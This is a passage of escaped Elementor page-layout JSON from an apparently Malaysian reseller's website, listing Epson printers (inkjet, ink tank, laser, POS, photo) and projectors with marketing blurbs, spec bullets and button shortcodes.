connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"7bcc969\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"561cb4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2432 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><p><br \\/>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11bfc36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4af8eba\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2055<\\/strong><\\/h4><p><img class=\\\"wp-image-2434 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"646b12f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"12\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"19\",\"bottom\":\"19\",\"left\":\"19\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2142W<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/h4>\\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\\n<ul>\\n \\t<li>White and Colour Brightness at 4,200lm<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>12000 hours lamp life in eco-mode<\\/li>\\n \\t<li>MHL-enabled<\\/li>\\n \\t<li>Multi-PC Projection<\\/li>\\n \\t<li>Horizontal Keystone Slider<\\/li>\\n \\t<li>Miracast<sup>\\u00ae<\\/sup><\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><\\/center>\\n<\\/span><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L500W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/>\\n\\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\\n<ul>\\n \\t<li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li>\\n \\t<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li>\\n \\t<li>Laser light source of up to 20,000 hours<\\/li>\\n \\t<li>Virtually maintenance-free for optical engine life<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"16f2278\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson LightScene EV-105<\\/strong><br \\/><br \\/><\\/h4><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" 